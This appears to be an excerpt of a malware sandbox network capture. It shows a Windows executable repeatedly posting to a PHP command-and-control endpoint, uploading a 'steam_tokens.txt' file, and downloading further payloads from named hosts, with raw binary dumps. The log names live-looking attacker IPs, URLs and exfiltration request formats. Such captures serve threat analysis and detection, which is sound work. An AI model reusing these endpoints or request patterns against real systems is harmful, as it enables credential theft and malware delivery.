Content-Type: multipart/form-data; boundary=----JJKFBFIJJECGCAAAFCBG
Host: 185.172.128.76
Content-Length: 1759
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:16.656502008 CEST 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:16.664164066 CEST 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGDAKEHIIDGDAAKECBFB
Host: 185.172.128.76
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:16.990602016 CEST 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:17.000415087 CEST 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKJKKKJJJKJKFHJJJJEC
Host: 185.172.128.76
Content-Length: 1759
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:17.329973936 CEST 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:17.339454889 CEST 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KEHCAFHIJECGCAKFCGDB
Host: 185.172.128.76
Content-Length: 1743
Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:17.667081118 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:17 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:17.674277067 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FHCAFIDBKEBFCBFIIIII
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1743
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:17.999665022 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:17 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:18.005913019 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JKJKKKJJJKJKFHJJJJEC
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1743
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:18.332216978 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:18 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:18.338828087 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----KEHCAFHIJECGCAKFCGDB
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1759
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:18.665191889 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:18 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:18.672043085 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FHCAFIDBKEBFCBFIIIII
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1743
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:18.999963045 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:18 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:19.014890909 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----EBAKFIIJJKJJJJJJEGDA
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1759
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:19.343151093 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:19 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:19.349328995 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----KEHCAFHIJECGCAKFCGDB
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1759
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:19.671528101 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:19 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:19.725867033 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJ
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1759
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:20.054353952 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:19 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:20.066903114 CEST  202  OUT  POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAEGCGCGIEGDHIDHJJEH
Host: 185.172.128.76
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:20.397135019 CEST  170  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:20.410613060 CEST  202  OUT  POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGIEBAFHJJDBGCAKJJKF
Host: 185.172.128.76
Content-Length: 1759
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:20.740798950 CEST  170  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:20.750499964 CEST  202  OUT  POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJEC
Host: 185.172.128.76
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:21.077893972 CEST  170  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:21.262625933 CEST  202  OUT  POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIDGDAKFHIEHJKFHDHDB
Host: 185.172.128.76
Content-Length: 1759
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:21.584465981 CEST  170  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:21.744515896 CEST  202  OUT  POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJ
Host: 185.172.128.76
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:22.069878101 CEST  170  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:22.224437952 CEST  202  OUT  POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJ
Host: 185.172.128.76
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:22.568440914 CEST  170  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:22.591295958 CEST  202  OUT  POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHC
Host: 185.172.128.76
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:22.918658018 CEST  170  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:23.084670067 CEST  202  OUT  POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBG
Host: 185.172.128.76
Content-Length: 1759
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:23.415165901 CEST  170  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:23.426882029 CEST  202  OUT  POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDGCGHIJKEGIECBFCBAE
Host: 185.172.128.76
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:23.753936052 CEST  170  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:23.775167942 CEST  202  OUT  POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KJJECGHJDBFIJJJKEHCB
Host: 185.172.128.76
Content-Length: 1759
Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:24.107075930 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:24 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:24.132877111 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BFBGCFCFHCFHIECAEHDH
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1759
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:24.457670927 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:24 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:24.471923113 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DHCGIDHDAKJECBFHCBAA
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1743
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:24.801193953 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:24 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:24.810260057 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----CBAFIDAECBGCBFHJEBGD
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1743
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:25.138154984 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:25 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:25.145081043 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJ
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1743
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:25.474698067 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:25 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:25.484427929 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AAEHJEGIIDAECAAKEBKF
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1743
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:25.809938908 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:25 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:25.817353964 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----CBAFIDAECBGCBFHJEBGD
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1743
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:26.143292904 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:26 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:26.160927057 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FIJJKECFCFBGDHIECAAF
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1743
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:26.488856077 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:26.496653080 CEST 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKF
Host: 185.172.128.76
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:26.818052053 CEST 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:26.828859091 CEST 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HJJEGCAAECBFIEBGHJDG
Host: 185.172.128.76
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:27.154762030 CEST 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:27.162348986 CEST 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIJJKECFCFBGDHIECAAF
Host: 185.172.128.76
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:27.487993956 CEST 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:27.499489069 CEST 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKF
Host: 185.172.128.76
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:27.829974890 CEST 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:27.875730991 CEST 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DAAAKFHIEGDGCAAAEGDG
Host: 185.172.128.76
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:28.197808981 CEST 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:29.775583982 CEST 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIEHDHCFIJDBFHJJDBFH
Host: 185.172.128.76
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:30.101774931 CEST 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:30.149338007 CEST 564 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJ
Host: 185.172.128.76
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii: ------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file"------IDAAFBGDBKJJJKFIIIJJ--
Apr 23, 2024 09:28:30.477977037 CEST 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:30.742116928 CEST 204 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKE
Host: 185.172.128.76
Content-Length: 127543
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:31.440407038 CEST 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:31.550086021 CEST 468 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHI
Host: 185.172.128.76
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------BKECAEBGHDAEBFHIEGHI
Content-Disposition: form-data; name="token"

934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99
------BKECAEBGHDAEBFHIEGHI
Content-Disposition: form-data; name="message"

1818166
------BKECAEBGHDAEBFHIEGHI--
Apr 23, 2024 09:28:31.876765966 CEST | 170 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49709 | 176.97.76.106 | 80 | 5148 | C:\Users\user\Desktop\4BfhCycV4B.exe
Timestamp | Bytes transferred | Direction | Data
Apr 23, 2024 09:28:01.793889999 CEST | 186 | OUT | GET /1/Qg_Appv5.exe HTTP/1.1
Host: note.padd.cn.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 23, 2024 09:28:02.027872086 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 23 Apr 2024 07:13:06 GMT
Content-Type: application/octet-stream
Content-Length: 8538160
Last-Modified: Mon, 22 Apr 2024 21:57:43 GMT
Connection: keep-alive
ETag: "6626dd57-824830"
Strict-Transport-Security: max-age=31536000
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49711 | 185.172.128.228 | 80 | 5148 | C:\Users\user\Desktop\4BfhCycV4B.exe
Timestamp | Bytes transferred | Direction | Data
Apr 23, 2024 09:28:14.647006035 CEST | 185 | OUT | GET /BroomSetup.exe HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 23, 2024 09:28:14.850066900 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Tue, 23 Apr 2024 07:28:14 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
ETag: "4a4030-613b1bf118700"
Accept-Ranges: bytes
Content-Length: 4866096
Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.850163937 CEST1289INData Raw: 40 00 01 00 00 00 00 02 00 3c 24 40 00 14 09 50 56 61 72 41 72 72 61 79 50 24 40 00 02 00 00 00 00 54 24 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc
                                                                                                                                                                                                                                                                                      Data Ascii: @<$@PVarArrayP$@T$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data$@Bounds$@TVarRecord@PRecord@RecI
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.850177050 CEST1289INData Raw: 41 00 f4 ff 24 2c 40 00 43 00 f4 ff 5a 2c 40 00 43 00 f4 ff a5 2c 40 00 43 00 f4 ff d9 2c 40 00 43 00 f4 ff 3b 2d 40 00 43 00 f4 ff 9d 2d 40 00 43 00 f4 ff ff 2d 40 00 43 00 f4 ff 61 2e 40 00 43 00 f4 ff c3 2e 40 00 43 00 f4 ff 25 2f 40 00 43 00
